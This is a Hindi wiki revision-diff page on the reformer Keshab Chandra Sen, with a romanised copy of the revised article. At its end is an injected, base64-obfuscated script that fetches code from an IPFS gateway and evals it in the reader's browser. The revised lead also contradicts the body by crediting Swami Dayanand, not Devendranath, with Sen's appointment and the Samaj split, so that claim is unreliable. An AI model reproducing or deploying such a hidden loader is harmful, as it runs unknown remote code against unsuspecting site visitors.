Difference between revisions of "केशव चन्द्र सेन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
[[चित्र:Keshab-Chandra-Sen.png|thumb|केशव चन्द्र सेन]]
 
[[चित्र:Keshab-Chandra-Sen.png|thumb|केशव चन्द्र सेन]]
'''केशव चन्द्र सेन''' (जन्म: [[19 नवम्बर]], 1838; मृत्यु: [[8 जनवरी]], [[1884]]) एक प्रसिद्ध धार्मिक व सामाजिक सुधारक, जो '[[ब्रह्म समाज]]' के संस्थापकों में से एक थे। केशवचन्द्र सेन ने ही [[आर्यसमाज]] के संस्थापक [[स्वामी दयानन्द सरस्वती]] को सलाह दी थी की वे [[सत्यार्थ प्रकाश]] की रचना हिन्दी में करें।
+
'''केशव चन्द्र सेन''' (जन्म- [[19 नवम्बर]], 1838, [[कलकत्ता]], [[पश्चिम बंगाल]], ब्रिटिश भारत; मृत्यु- [[8 जनवरी]], [[1884]], [[कलकत्ता]], बंगाल प्रेसीडेंसी) एक प्रसिद्ध धार्मिक व सामाज सुधारक, जो '[[ब्रह्मसमाज]]' के संस्थापकों में से एक थे। वे बड़े तीव्र बुद्धि, तार्किक और विद्वान युवक थे। उन्होंने उत्साहपूर्वक समाज को संगठित करना प्रारम्भ किया और इस कारण [[स्वामी दयानंद सरस्वती]] के कृपापात्र होकर वे शीघ्र ही उनके आचार्य पद पर नियुक्त हो गये। केशव चन्द्र सेन ने ही स्वामी दयानन्द सरस्वती को सलाह दी थी की वे '[[सत्यार्थ प्रकाश]]' की रचना [[हिन्दी]] में करें। केशव चन्द्र सेन और स्वामीजी के विचार आपस में नहीं मिलते थे, जिस कारण ब्रह्म समाज का विभाजन 'आदि ब्रह्मसमाज' और 'भारतवर्षीय ब्रह्मसमाज' में हो गया।
 
==जीवन परिचय==
 
==जीवन परिचय==
केशवचंद्र सेन का जन्म 19 नवंबर, 1838 को [[कोलकाता]] में हुआ था। उनके पिता का नाम प्यारेमोहन था, वह प्रसिद्ध वैष्णव एवं विद्वान दीवान रामकमल के पुत्र थे। केशवचंद्र के आकर्षक व्यक्तित्व ने ही ब्रह्मसमाज आंदोलन को स्फूर्ति प्रदान की थी। उन्होंने भारत के शैक्षिक, सामाजिक तथा आध्यात्मिक पुनर्जन्म में चिर स्थायी योगदान दिया। [[1866]] में केशवचंद्र ने 'भारतवर्षीय ब्रह्मसमाज' की स्थापना की। इसे देख देवेंद्रनाथ ने अपने समाज का नाम भी आदि ब्रह्मसमाज रख दिया था।
+
केशवचंद्र सेन का जन्म 19 नवंबर, 1838 को [[कलकत्ता]] (आधुनिक कोलकाता), ब्रिटिश भारत में हुआ था। उनके [[पिता]] का नाम प्यारेमोहन था। वह प्रसिद्ध [[वैष्णव]] एवं विद्वान दीवान रामकमल के पुत्र थे। जब केशवचंद्र सेन मात्र दस वर्ष के बालक ही थे, तभी इनके पिता का निधन हो गया था। ऐसे में इनके चाचा ने इन्हें पाला। केशवचंद्र के आकर्षक व्यक्तित्व ने ही ब्रह्मसमाज आंदोलन को स्फूर्ति प्रदान की थी। उन्होंने [[भारत]] के शैक्षिक, सामाजिक तथा आध्यात्मिक पुनर्जन्म में चिर स्थायी योगदान दिया। [[1866]] में केशवचंद्र ने 'भारतवर्षीय ब्रह्मसमाज' की स्थापना की। इसे देखकर देवेंद्रनाथ ने अपने समाज का नाम भी आदि ब्रह्मसमाज रख दिया था।
 
+
====आचार्य का पद====
 +
बाल्यावस्था से ही केशवचंद्र का उच्च आध्यात्मिक जीवन था। वे बड़े तीव्र बुद्धि, तार्किक और विद्वान् युवक थे। महर्षि देवेन्द्रनाथ को वे [[ब्रह्मसमाज]] के लिए बड़े उपयोगी जान पड़े। [[1857]] में वे ब्रह्मसमाज में सम्मिलित हो गये। उन्होंने उत्साहपूर्वक समाज को संगठित करना प्रारम्भ किया और इस कारण महर्षि के कृपापात्र होकर वे शीघ्र ही उसके आचार्य पद पर नियुक्त हो गये, परन्तु केशव बाबू का आना ब्रह्म समाज के संगठन और स्वरूप के लिए अभिशाप बन गया। महर्षि देवेन्द्रनाथ और केशवबाबू के विचार नहीं मिलते थे, परिणामत: ब्रह्मसमाज का विभाजन हो गया। मूल ब्रह्मसमाज 'आदि ब्रह्मसमाज' के नाम से जाना जाने लगा और केशवबाबू का नवगठित समाज 'भारतवर्षीय ब्रह्मसमाज' के नाम से प्रसिद्ध हुआ।<ref>{{cite web |url=http://www.aryasamajindore.com/index.php/arya-bharat-2 |title=भाग्य विधाता महर्षि दयानंद सरस्वती- 2|accessmonthday= 07 नवम्बर|accessyear= 2013|last= |first= |authorlink= |format= |publisher= |language=हिंदी}}</ref>
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 09:17, 7 November 2013

thumb|keshav chandr sen keshav chandr sen (janm- 19 navambar, 1838, kalakatta, pashchim bangal, british bharat; mrityu- 8 janavari, 1884, kalakatta, bangal presideansi) ek prasiddh dharmik v samaj sudharak, jo 'brahmasamaj' ke sansthapakoan mean se ek the. ve b de tivr buddhi, tarkik aur vidvan yuvak the. unhoanne utsahapoorvak samaj ko sangathit karana prarambh kiya aur is karan svami dayanand sarasvati ke kripapatr hokar ve shighr hi unake achary pad par niyukt ho gaye. keshav chandr sen ne hi svami dayanand sarasvati ko salah di thi ki ve 'satyarth prakash' ki rachana hindi mean karean. keshav chandr sen aur svamiji ke vichar apas mean nahian milate the, jis karan brahm samaj ka vibhajan 'adi brahmasamaj' aur 'bharatavarshiy brahmasamaj' mean ho gaya.

jivan parichay

keshavachandr sen ka janm 19 navanbar, 1838 ko kalakatta (adhunik kolakata), british bharat mean hua tha. unake pita ka nam pyaremohan tha. vah prasiddh vaishnav evan vidvan divan ramakamal ke putr the. jab keshavachandr sen matr das varsh ke balak hi the, tabhi inake pita ka nidhan ho gaya tha. aise mean inake chacha ne inhean pala. keshavachandr ke akarshak vyaktitv ne hi brahmasamaj aandolan ko sphoorti pradan ki thi. unhoanne bharat ke shaikshik, samajik tatha adhyatmik punarjanm mean chir sthayi yogadan diya. 1866 mean keshavachandr ne 'bharatavarshiy brahmasamaj' ki sthapana ki. ise dekhakar deveandranath ne apane samaj ka nam bhi adi brahmasamaj rakh diya tha.

achary ka pad

balyavastha se hi keshavachandr ka uchch adhyatmik jivan tha. ve b de tivr buddhi, tarkik aur vidvanh yuvak the. maharshi devendranath ko ve brahmasamaj ke lie b de upayogi jan p de. 1857 mean ve brahmasamaj mean sammilit ho gaye. unhoanne utsahapoorvak samaj ko sangathit karana prarambh kiya aur is karan maharshi ke kripapatr hokar ve shighr hi usake achary pad par niyukt ho gaye, parantu keshav baboo ka ana brahm samaj ke sangathan aur svaroop ke lie abhishap ban gaya. maharshi devendranath aur keshavababoo ke vichar nahian milate the, parinamat: brahmasamaj ka vibhajan ho gaya. mool brahmasamaj 'adi brahmasamaj' ke nam se jana jane laga aur keshavababoo ka navagathit samaj 'bharatavarshiy brahmasamaj' ke nam se prasiddh hua.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. bhagy vidhata maharshi dayanand sarasvati- 2 (hiandi). . abhigaman tithi: 07 navambar, 2013.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>